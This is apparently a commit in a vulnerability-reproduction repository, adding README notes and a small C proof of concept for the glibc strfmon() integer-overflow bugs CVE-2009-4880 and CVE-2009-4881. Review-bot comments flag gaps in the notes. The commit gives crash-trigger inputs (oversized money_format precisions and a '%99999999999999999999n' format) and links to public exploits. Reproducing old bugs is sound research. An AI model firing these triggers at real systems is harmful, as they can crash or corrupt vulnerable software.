
add info for CVE-2009-4880/4881

mudongliang committed May 31, 2018
1 parent 2716377 commit c15d0e2025d5b54b672b394fa05f0efdf7a4e218
Showing with 63 additions and 3 deletions.
  1. +31 −0 CVE-2009-4880/README.md
  2. +19 −1 CVE-2009-4881/README.md
  3. +11 −0 CVE-2009-4881/poc.c
  4. +2 −2 README.md
@@ -2,14 +2,45 @@

## Experiment Environment

CentOS 5.5

## INSTALL & Configuration

Preinstalled environment and install php

```
tar -xvf php-5.2.9.tar.gz
cd php-5.2.9
./configure
make
```

## Problems in Installation & Configuration


## How to trigger vulnerability

```
./sapi/cli/php -r 'money_format("%.1073741821i",1);'
./sapi/cli/php -r 'money_format("%.1343741821i",1);'
```

## PoCs

[ GNU glibc 'strfmon()' Function Integer Overflow Weakness](https://bugs.gentoo.org/285818)

[GNU glibc 'strfmon()' Function Integer Overflow Weakness](https://www.securityfocus.com/bid/36443/exploit)

[GNU glibc 2.x - 'strfmon()' Integer Overflow](https://www.exploit-db.com/exploits/33230/)

## Vulnerability Patch

### Root Cause

### Stack Trace

### Patch

See details in <https://sourceware.org/git/?p=glibc.git;a=commit;h=199eb0de8d673fb23aa127721054b4f1803d61f3>

## References
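
Review bot: The "How to trigger vulnerability" block gives two `money_format` commands but does not say what a successful reproduction looks like (crash, hang, error text) or why two different precision values are listed. The environment section names only CentOS 5.5 and php-5.2.9, while the linked PoCs and the patch are for glibc `strfmon()`, so the installed glibc version should be recorded as well. The first PoC link title has a stray leading space (`[ GNU glibc`), and the first two links share one title, so a reader cannot tell them apart.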
@@ -1,19 +1,37 @@
# CVE/EDB ID
# CVE-2009-4881

## Experiment Environment

CentOS 5.5

## INSTALL & Configuration

Preinstalled environment

## Problems in Installation & Configuration


## How to trigger vulnerability

```
gcc -o pln poc.c
./pln %99999999999999999999n
```

## PoCs

[CVE-2009-4881 glibc (32-bit): Integer overflow in the __vstrfmon_l function](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2009-4881)

[libc (strfmon) Multiple vulnerabilities](http://cxsecurity.com/issue/WLB-2008030063)

## Vulnerability Details & Patch

### Root Cause

### Stack Trace

### Patch

<https://sourceware.org/git/?p=glibc.git;a=blobdiff;f=stdlib/strfmon_l.c;h=8e63d459e3a15ad6777be1d613216f92f398d64e;hp=c9f3a47b41d27a6c393ffbda86328c8ca569e623;hb=153aa31b93be22e01b236375fb02a9f9b9a0195f;hpb=59a7162b17f55cb292844e37ceb9c3b0a1994080>

## References
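
Review bot: The build step `gcc -o pln poc.c` does not fix the target word size, yet the Red Hat entry linked under PoCs describes the issue as "glibc (32-bit)". State whether the CentOS 5.5 install is i386 or x86_64 and, if the latter, how a 32-bit binary is produced (for example with `-m32`), and add the expected result of `./pln %99999999999999999999n`. The Patch section is a bare blobdiff URL; a short line naming the file it touches (`stdlib/strfmon_l.c`) would make it readable without following the link.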
@@ -0,0 +1,11 @@
#include <stdio.h>
#include <monetary.h>

int main(int argc, char* argv[]){
char buff[51];
char *bux=buff;
int res;

res=strfmon(bux, 50, argv[1], "0");
return 0;
}
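
Review bot: `argv[1]` is passed to `strfmon` in `main` without an `argc` check, so running `./pln` with no argument hands a null format pointer to the call instead of exercising the bug; add a guard that prints usage and returns non-zero. The value argument is the string `"0"`, whereas the `n` and `i` conversions of `strfmon` consume a `double`, so passing `0.0` would keep the only irregular input the format string itself. `res` is assigned and never read; printing it would let the README show the observed outcome.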
@@ -141,8 +141,8 @@ If you encounter problems with keyword "Failed to lock files", you could try to
- [ ] CVE-2009-3050
- [ ] CVE-2009-3586
- [ ] CVE-2009-4134
- [ ] CVE-2009-4880
- [ ] CVE-2009-4881
- [x] CVE-2009-4880
- [x] CVE-2009-4881
- [x] CVE-2009-5018
- [x] CVE-2010-1147
- [x] CVE-2010-1159
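
Review bot: The CVE-2009-4880 and CVE-2009-4881 entries are ticked as done, but the "Root Cause" and "Stack Trace" headings in both READMEs added by this commit are empty, as are "Problems in Installation & Configuration" and "References". Fill those sections in, or leave the boxes unchecked until they are.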
